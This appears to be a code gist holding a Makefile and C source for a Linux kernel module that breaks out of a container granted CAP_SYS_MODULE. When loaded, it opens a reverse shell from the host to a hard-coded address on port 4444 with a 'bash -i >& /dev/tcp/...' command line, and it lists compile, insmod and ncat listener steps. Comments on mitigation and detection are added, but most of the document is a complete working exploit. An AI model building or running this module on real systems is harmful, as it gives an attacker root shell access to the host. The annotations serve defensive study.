
@brant-ruan
Created December 13, 2022 10:50
container breakout with CAP_SYS_MODULE
# Kbuild makefile for the out-of-tree kernel module reverse_shell_lkm.ko.
# Defender note: a container can only load the resulting .ko if it was granted
# CAP_SYS_MODULE (or runs privileged); the module then executes in the kernel
# that the container shares with the host.
obj-m := reverse_shell_lkm.o
# Kernel build tree of the currently running kernel (needs matching headers).
KBUILD_DIR := /lib/modules/`uname -r`/build
# NOTE(review): this sets flags for vuln.o, which is not listed in obj-m above,
# so it looks like a leftover with no effect on this build — confirm.
CFLAGS_vuln.o := -O0
# NOTE(review): make requires recipe lines to start with a tab; the leading
# whitespace of the two $(MAKE) lines appears to have been lost on this page.
all:
$(MAKE) -C $(KBUILD_DIR) M=$(shell pwd) modules
clean:
$(MAKE) -C $(KBUILD_DIR) M=$(shell pwd) clean
/*
* compile:
* apt install -y build-essential linux-headers-$(uname -r)
* make
*
* in container:
* apt install -y kmod
* insmod reverse_shell_lkm.ko
*
* listener:
* ncat -lvnp 4444
*
* ref:
* https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities#cap_sys_module
*/
#include <linux/kmod.h>
#include <linux/module.h>
/* Module metadata; these strings end up in the .ko and are shown by modinfo. */
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

/*
 * Argument vector passed to the user-mode helper at module load.
 *
 * The third element makes bash open an outbound TCP connection to a
 * hard-coded RFC 1918 address on port 4444 and attach an interactive shell
 * to it. For detection, the relevant signals are an interactive bash with a
 * network socket on stdin/stdout and unexpected egress from the host.
 *
 * NOTE(review): argv is the only file-scope object here without `static`
 * (envp below has it), so the symbol gets external linkage.
 */
char *argv[] = {
	"/bin/bash",
	"-c",
	"bash -i >& /dev/tcp/172.16.56.1/4444 0>&1",
	NULL,
};

/* Environment for the helper: only PATH is set. */
static char *envp[] = {
	"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
	NULL,
};
/*
 * Module entry point, run once when the module is loaded.
 *
 * call_usermodehelper() asks the kernel to start a user-space process. That
 * process is created by a kernel thread, not by the task that loaded the
 * module, so it is not confined by the loading container's namespaces or
 * cgroups. This is why CAP_SYS_MODULE inside a container is equivalent to
 * host root.
 *
 * UMH_WAIT_EXEC makes the call return once the exec has been attempted,
 * without waiting for the process to exit. The result is returned as the
 * init status, so a non-zero value makes the module load fail.
 *
 * Mitigation: do not grant CAP_SYS_MODULE or privileged mode to containers;
 * enforce module signing (CONFIG_MODULE_SIG_FORCE) or kernel lockdown; set
 * the kernel.modules_disabled sysctl once boot-time modules are loaded.
 * Detection: audit the init_module/finit_module syscalls, watch the kernel
 * log for out-of-tree or unsigned module taint messages, and alert on shells
 * whose parent is a kernel thread.
 */
static int __init reverse_shell_init(void)
{
	int rc;

	rc = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
	return rc;
}
/*
 * Module exit hook, run on unload.
 *
 * It only writes one KERN_INFO line to the kernel log. Nothing here tracks or
 * stops the helper process started at load time, so unloading the module does
 * not by itself end that process. Responders need to find and kill it
 * separately.
 */
static void __exit reverse_shell_exit(void)
{
	printk(KERN_INFO "Exiting\n");
}
/* Register the load-time and unload-time hooks with the module loader. */
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);